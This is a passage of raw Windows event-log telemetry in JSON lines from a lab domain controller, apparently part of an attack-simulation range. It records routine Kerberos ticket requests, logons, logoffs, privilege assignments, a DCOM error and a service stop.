{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":37,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76836,"ProcessID":1216,"ThreadID":1488,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time provider NtpClient is currently receiving valid time data from time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123->13.86.101.172:123).","Opcode":"Info","TimeSource":"time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123-&gt;13.86.101.172:123)","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220323,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-6178966$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{00831AAD-7772-5B99-90B2-A3A58B721FE0}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-6178966$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{00831AAD-7772-5B99-90B2-A3A58B721FE0}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220324,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45551\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x45551","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220325,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x45551\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x45551","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"0","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220326,"ProcessID":864,"ThreadID":2652,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x456D0\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x456d0","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220327,"ProcessID":864,"ThreadID":2652,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x456D0\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t10.0.1.14\r\n\tSource Port:\t\t49706\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x456d0","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"10.0.1.14","IpPort":"49706","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":10016,"SourceName":"Microsoft-Windows-DistributedCOM","ProviderGuid":"{1B562E86-B7AA-4131-BADC-B6F3A001407E}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76837,"ProcessID":1004,"ThreadID":852,"Channel":"System","Domain":"ATTACKRANGE","AccountName":"Administrator","UserID":"S-1-5-21-2231640892-1842410504-3836505531-500","AccountType":"User","Message":"The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID \r\n{D63B10C5-BB46-4990-A94F-E40B9D520160}\r\n and APPID \r\n{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}\r\n to the user ATTACKRANGE\\Administrator SID (S-1-5-21-2231640892-1842410504-3836505531-500) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.","Opcode":"Info","param1":"application-specific","param2":"Local","param3":"Activation","param4":"{D63B10C5-BB46-4990-A94F-E40B9D520160}","param5":"{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}","param6":"ATTACKRANGE","param7":"Administrator","param8":"S-1-5-21-2231640892-1842410504-3836505531-500","param9":"LocalHost (Using LRPC)","param10":"Unavailable","param11":"Unavailable","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220328,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x456D0\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x456d0","LogonType":"3","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220329,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45551\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x45551","LogonType":"3","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220330,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45F96\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x45f96","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220331,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x45F96\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x45f96","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"0","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220332,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45F96\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x45f96","LogonType":"3","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220333,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x45322\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x45322","LogonType":"3","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76838,"ProcessID":856,"ThreadID":1116,"Channel":"System","Message":"The NcaSvc service entered the stopped state.","param1":"NcaSvc","param2":"stopped","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220334,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220335,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{5F77CC13-BD98-A231-0CE6-3FD8C44D6CE1}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket 